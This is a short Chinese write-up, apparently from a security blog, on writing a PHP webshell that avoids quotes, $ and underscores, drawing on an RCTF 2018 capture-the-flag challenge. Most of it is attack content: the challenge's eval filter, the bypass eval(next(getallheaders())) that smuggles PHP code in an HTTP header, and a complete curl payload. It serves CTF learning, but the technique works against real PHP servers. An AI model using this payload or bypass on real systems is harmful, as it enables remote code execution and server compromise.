问题
怎么在不允许使用 '
、"
、$
、_
的情况下写一个webshell?
启发
在RCTF 2018的比赛中有相似题目
<?php
sha1($_SERVER['REMOTE_ADDR']) === '99754106633f94d350db34d548d6091a' ?: die();
';' === preg_replace('/[^\W_]+\((?R)?\)/', NULL, $_GET['cmd']) ? eval($_GET['cmd']) : show_source(__FILE__);
这里和上面的条件是非常相似的,也是禁止了下划线,和任意非单词字符。
绕过
其实在PHP中还有一个函数是getallheaders
这个可以获取到整个Http头信息
<?php
print_r(getallheaders());
会打印http头信息。
我们就可以指定Header中的头信息,加入我们的payload就可以绕过。
但是getallheaders()
返回的是一个数组,eval()
函数里面传递数组是无法生效的。有什么方法能获取到数组里面的具体的键值呢?
next()
!
next()
函数,可以在函数将内部指针指向数组中的下一个元素,并输出
我们使用eval(next(getallheaders()));
这种方式就可以绕过了上题的要求了,实现无$符号,无特殊字符,下划线的命令执行了。
这样payload为:curl -H "User-Agent: echo(123);" -H "Accept: asdasd/asdasda" "http://localhost:85/test.php?cmd=eval(next(getallheaders()));